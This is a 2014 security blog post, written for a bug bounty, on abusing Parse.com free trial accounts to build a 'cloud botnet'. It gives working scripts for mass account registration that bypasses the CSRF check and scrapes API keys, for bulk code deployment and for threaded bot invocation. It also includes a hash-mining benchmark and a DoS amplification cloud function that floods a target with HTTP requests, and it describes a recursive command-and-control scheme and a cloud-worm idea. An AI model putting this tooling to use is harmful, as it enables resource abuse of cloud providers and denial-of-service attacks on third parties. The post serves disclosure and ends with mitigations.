Wednesday 10 September 2014

Building a Cloud Botnet on Parse.com

Today I'm going to talk about Parse.com and a trial account feature that allowed me to build a cloud botnet.

Parse is a cloud-based app service that lets you deploy and run your app code in the cloud, making apps easier to build and maintain. Facebook bought the company in 2013, and with Parse being eligible for the bug bounty program I thought I'd take a look for security issues.


Want a free account?

Parse offer free trial accounts with 20GB storage, 2TB of traffic per month, a maximum of 30 requests/sec, and the ability to run one process at a time for a maximum of 15 seconds before it's killed.

The stats above are for one account, but what if we sign up for two accounts? That would effectively double all my quotas. How about a hundred, a thousand or a million accounts? I could massively increase my limits and cause all kinds of mischief.
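To put rough numbers on that scaling, here's a quick sketch using the trial limits above (the account counts are purely illustrative):

```python
# Aggregate quota for n trial accounts, each with the limits above
STORAGE_GB, TRAFFIC_TB, REQ_PER_SEC = 20, 2, 30

def aggregate(n):
    # Quotas scale linearly with the number of accounts you control
    return {'storage_gb': n * STORAGE_GB,
            'traffic_tb': n * TRAFFIC_TB,
            'req_per_sec': n * REQ_PER_SEC}

for n in (2, 100, 1000, 1000000):
    q = aggregate(n)
    print("{0} accounts: {1} GB storage, {2} TB traffic/month, {3} req/sec".format(
        n, q['storage_gb'], q['traffic_tb'], q['req_per_sec']))
```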

Taking a look at the registration page (in 2013), I found no hardening at all. Account registration was as simple as sending this POST request:
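The screenshot of the original request hasn't survived, but judging from the registration script later in this post it would have looked roughly like this (field names taken from the script, values illustrative):

```
POST /users HTTP/1.1
Host: parse.com
Content-Type: application/x-www-form-urlencoded

user[name]=blahblah123&user[email]=blahblah123@test.com&user[password]=password1
```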


In 2013 there was no email verification, no CSRF token, no captcha and no throttling; the security team had basically missed the registration page. One year later, email verification is still not required. A CSRF header and a session cookie are now required, but there still isn't any anti-automation, so anyone could register a million trial accounts.


Building my army

In 2013 it was easy to register accounts by just using Burp Intruder to send multiple registration POST requests. Because of the new session/CSRF requirements in 2014, I created a Python script to perform registration.

The script connects to Parse, grabs the session info and CSRF header, registers an account, registers an app for that account, then grabs the API keys we'll need to communicate with our bots.

My account creation script:
import requests
import re
from random import randint

for i in xrange(100):
    user = "blahblah" + str(randint(100, 999))
    print user

    print "[+] Getting Parse main page"
    s = requests.Session()
    r = s.get('https://parse.com')
    csrf = re.findall('[a-zA-Z0-9+/]{43}=', r.text)
    print "-----CSRF Token: " + csrf[0]
    s.headers.update({'X-CSRF-Token': csrf[0]})

    print "[+] Posting registration request"
    payload = {'user[name]': user, 'user[email]': user + '@test.com', 'user[password]': 'password1'}
    r = s.post('https://parse.com/users', params=payload)
    print r.status_code

    print "[+] PUTing new app name"
    s.headers.update({'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'})
    payload = {'user[company_type]': 'individual', 'parse_app[name]': 'blahblahblah' + str(randint(100, 999))}
    r = s.put('https://parse.com/account', params=payload)
    print r.status_code

    print "[+] Grabbing keys"
    r = s.get('https://parse.com/account/keys')
    print r.status_code
    # Pull the key values out of the input fields on the keys page
    keys = re.findall('<input type="text" value="[^"]+', r.text)
    print user + ':' + keys[0].replace('<input type="text" value="', '') + ':' + keys[5].replace('<input type="text" value="', '')


Using the Parse tools to deploy code

There are two ways to deploy code: using the Parse tool (a packaged Python script) or directly through the API (api.parse.com/1/deploy). Connecting directly to the API is the cleaner option, but it would have taken me a while to reverse the Parse tool and extract the integrity check code. To save time I just used the Parse tool as is. To use the tool, though, you need to create a project locally and add your apps before you can deploy code.

Create a new project:
parse new parsebotnet

Add every app locally:
#!/usr/bin/expect -f
# Log in as each account in turn and add its first app to the local project
for {set i 1} {$i < 101} {incr i 1} {
    set timeout -1
    spawn parse add
    expect "Email:*"
    send -- "test$i@test.com\r"
    expect "Password:*"
    send -- "test$i\r"
    expect "Select an App:"
    send -- "1\r"
    send -- "\r"
}

You can then grep the appids and keys from the global.json settings file:
cat global.json|grep applicationId|cut -d "\"" -f4 > appid
cat global.json|grep masterKey|cut -d "\"" -f4 > keys
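grep works, but it depends on key order and quoting. A small Python alternative that parses global.json properly is sketched below, assuming the old parse CLI layout of an "applications" map with "applicationId" and "masterKey" per app (verify against your own global.json):

```python
import json

def extract_keys(config_text):
    # Return sorted (applicationId, masterKey) pairs from a global.json blob,
    # assuming the layout: {"applications": {"<app>": {"applicationId": ..., "masterKey": ...}}}
    apps = json.loads(config_text).get('applications', {})
    return sorted((a.get('applicationId'), a.get('masterKey')) for a in apps.values())

# Usage: pairs = extract_keys(open('global.json').read())
```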

To send code to Parse you just put your code in the cloud folder on your local machine and run the deploy command. I started off by putting a hello world program in main.js:
Parse.Cloud.define("hello", function(request, response) {
  response.success("Hello world!");
});

And uploaded it to every bot using a bash for loop:
#!/bin/bash
for i in {1..100};do echo "Job#$i";parse deploy testapp1$i & done;

Not the cleanest approach, but the Parse tool does all of the legwork.


Running Code

With the bot accounts created and code uploaded, I could call the API and have the bots actually run my code. The simple approach was just using curl:
#!/bin/bash
# Read app ids and master keys line by line and call the hello function on each bot

eof=0
exec 5<appid
exec 6<key
while [[ $eof -eq 0 ]]
do
 if read l1<&5; then
  read l2 <&6
  curl -X POST -H "X-Parse-Application-Id: $l1" -H "X-Parse-Master-Key: $l2" -H "Content-Type: application/json" -d '{}' https://api.parse.com/1/functions/hello
  printf "\n"
 else
  eof=1
 fi
done

I also put together a snazzier Python script, with threading code borrowed from Stack Overflow:
import requests
import threading
import time
import Queue
import json

with open("appid") as f:
    appid = f.readlines()

with open("keys") as f:
    key = f.readlines()

def callapi(x):
    # Build headers per request - mutating one shared session across
    # threads would be a race condition
    i = x % len(appid)   # wrap around so 1000 jobs cycle through the 100 apps
    headers = {'X-Parse-Application-Id': appid[i].rstrip(),
               'X-Parse-Master-Key': key[i].rstrip(),
               'Content-Type': 'application/json'}
    r = requests.post('https://api.parse.com/1/functions/hello',
                      headers=headers, data=json.dumps({}))
    print "No: " + str(x) + "  Code:" + str(r.status_code) + "  Dataz:" + str(r.text)

queue = Queue.Queue()

class ThreadUrl(threading.Thread):

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            # Grab the next job number from the queue
            j = self.queue.get()

            # Call the hello function on that bot
            callapi(j)

            # Signal that this job is done
            self.queue.task_done()

start = time.time()

def main():
    # Spawn a pool of daemon threads and hand them the queue
    for m in range(160):
        t = ThreadUrl(queue)
        t.setDaemon(True)
        t.start()

    # Populate the queue with job numbers
    for n in xrange(1000):
        queue.put(n)

    # Wait until everything on the queue has been processed
    queue.join()

main()
print "Elapsed Time: %s" % (time.time() - start)


Do something cool!

At this point I guess you're wondering: after all this configuration, what can you actually do?

Well, Parse allows you to process data and send HTTP requests. For a bad guy this means they could do things like mine bitcoins, crack hashes, run DoS attacks or proxy malicious requests. For testing purposes I decided to focus on bitcoin mining and DoS proofs of concept.


$$$ Mining some coin $$$

Knowing next to nothing about bitcoin mining, I did a little Googling and came across a post that had a great practical explanation of mining. As mining basically consists of SHA256 hashing, I decided to create a hashing benchmark script for Parse. As Parse uses JavaScript, I took the CryptoJS SHA256 code and uploaded it to Parse with a for loop and timer:

Parse.Cloud.define("sha256", function(request, response) {

  <insert CryptoJS code>

  var start = new Date();
  for (var i = 0; i < request.params.iter; i++) {
    CryptoJS.SHA256("Message" + i);
  }
  response.success("time: " + ((new Date()) - start) / 1000);
});

Testing different iteration values, I found one Parse instance could handle roughly 40,000 hashes per second, which is pretty slow. Using the threaded Python script above to continually call multiple instances, I could hit about 6,000,000 hashes per second. But even this is nowhere near the speed of real mining hardware. (Also, real mining uses double SHA256, so the 6MH/s is probably nearer 3MH/s in real terms.)
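For reference, bitcoin's proof-of-work hashes the block header twice with SHA-256, which is where the halving comes from. A quick sketch of double hashing plus the rate arithmetic (figures taken from my benchmarks above):

```python
import hashlib

def double_sha256(data):
    # Bitcoin's proof-of-work applies SHA-256 twice to the block header
    return hashlib.sha256(hashlib.sha256(data).digest()).hexdigest()

print(double_sha256(b"Message0"))

# Rate arithmetic from the benchmarks above
per_instance = 40000        # single SHA256 hashes/sec for one Parse instance
total = 6000000             # hashes/sec across threaded instances
instances = total // per_instance   # concurrent instances needed
effective = total // 2              # double hashing halves the effective rate
print("{0} instances, ~{1} double-hashes/sec".format(instances, effective))
```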

Part of the problem is the 15 second time limit on Parse processes; another issue is that Parse have throttling in place, so if you make too many API requests they start blocking connections. So bitcoin mining seemed possible but not practical with the current restrictions.


Denial Of Service

Using multiple trial accounts and some form of amplification I was curious how high I could get my outbound traffic volume (going from Parse to my target).

Starting with some simple httpRequest code, I was able to get my instance to send thirty outbound requests for every one API request, proving amplification was possible. Two things to note though: the outbound requests go at a max rate of around 15 requests a second, and you need to remove the success/error response as that will close the process.

Example test code is below:
Parse.Cloud.define("amptest", function(request, response) {
  for (var j = 0; j < request.params.scale; j++) {
    Parse.Cloud.httpRequest({
      url: 'http://myip/hello',
      method: 'POST',
      body: {
        countj: j
      },
      success: function(httpResponse) {
        //response.success(httpResponse.text);
      },
      error: function(httpResponse) {
        //response.error("Some error: " + httpResponse.status);
      }
    });
  }
});

When scaling this up, though, the bottleneck is the same as with the bitcoin mining: 15 second processes and the max API requests per second limit the throughput. But is there any way around these restrictions?


C&C in the cloud?

It dawned on me that instead of using my workstation as the command and control, I could use one of my apps as the C&C. I could send one request to my C&C app and it would communicate with all the other apps. But why stop at one C&C? Having one master, multiple slave C&Cs and a pool of workers would in theory help increase throughput, as I would be sending requests from multiple Parse IP addresses.

I created some recursive app code that included a list of every bot's appid and key and pushed this to every bot. The code would select bots at random and request that they run the same code. I passed a counter parameter that was incremented after each request to give the illusion of a tiered infrastructure. When the counter hit the "worker tier", instead of calling other bots, the bot would send multiple HTTP requests to the target site.
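The real bot code ran as Parse Cloud Code, but the fan-out logic can be sketched in Python (bot list, tier depth and branch factor are illustrative; each "call" here just recurses locally instead of hitting the Parse API):

```python
import random

def fanout(bots, counter, max_tier, branch, sent):
    # Each C&C tier picks `branch` bots at random and forwards the job with
    # an incremented counter; the final "worker" tier hits the target instead.
    if counter >= max_tier:
        sent.append(1)          # worker tier: one request to the target
        return
    for _ in random.sample(bots, branch):
        fanout(bots, counter + 1, max_tier, branch, sent)

sent = []
fanout(bots=list(range(100)), counter=0, max_tier=3, branch=5, sent=sent)
print("Requests hitting the target: {0}".format(len(sent)))  # branch ** max_tier
```

With three tiers and a branch factor of five, one API request turns into 125 worker-tier requests, which is the amplification the tiering is after.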

With multiple workers all simultaneously connecting to the target IP, I got something like this:


The source IP is Parse; the destination is my local machine. Looking at the "Time" column you can see a throughput of roughly 600-1000 requests per second. For me this was a promising start, and I'm sure that with some code tweaks, more bots and more than one external IP, the requests per second could have been increased substantially.


90's worm + 2014 cloud = CLOUD WORM!?

Although I didn't have time to build a working PoC, I think it may be possible to build a cloud worm on Parse. In a nutshell: as Parse allow accounts to run code and send HTTP requests, there is the possibility that a Parse app could itself create a new account, then deploy and run code on it. The new account would then repeat this process, and so on, gradually consuming the entire cloud's resources.
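As a thought experiment only, the worm loop would look something like this. All three helpers are hypothetical stand-ins for the registration, deploy and run steps covered earlier; nothing here actually talks to Parse:

```python
def register_account():
    # Hypothetical stand-in for the registration script earlier in the post
    return {'appid': 'new-app', 'key': 'new-key'}

def deploy_code(account):
    # Hypothetical stand-in for `parse deploy` - pushes this same worm code
    pass

def run_code(account):
    # Hypothetical stand-in for the cloud function call that restarts the cycle
    pass

def worm_cycle(generations):
    # Each generation registers a fresh account, deploys itself and triggers
    # the copy, which would then repeat the process on the new account
    infected = []
    for _ in range(generations):
        account = register_account()
        deploy_code(account)
        run_code(account)
        infected.append(account)
    return infected

print("Simulated {0} worm generations".format(len(worm_cycle(3))))
```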

Cloud worm PoC is this week's homework, class dismissed ;)


Final Thoughts

Letting people run code on your servers is a risky business. To prevent abuse you need a solid sandbox and tight resource restrictions/monitoring. In this post I've only scratched the surface of Parse looking at some super obvious issues. I wish I'd had more time to dig into the cloud worm possibilities as well as background jobs which looked interesting.

Mitigation-wise, anti-automation and email verification on the sign-up page would have helped, as would tighter inbound/outbound throttling and resource restrictions for trial accounts, and blocking app-to-app access. As far as I know, Facebook/Parse chose not to implement any of these fixes and instead decided to focus on monitoring for suspicious resource usage.

Questions, comments and corrections are always appreciated! Thanks for reading.

Pwndizzle out.
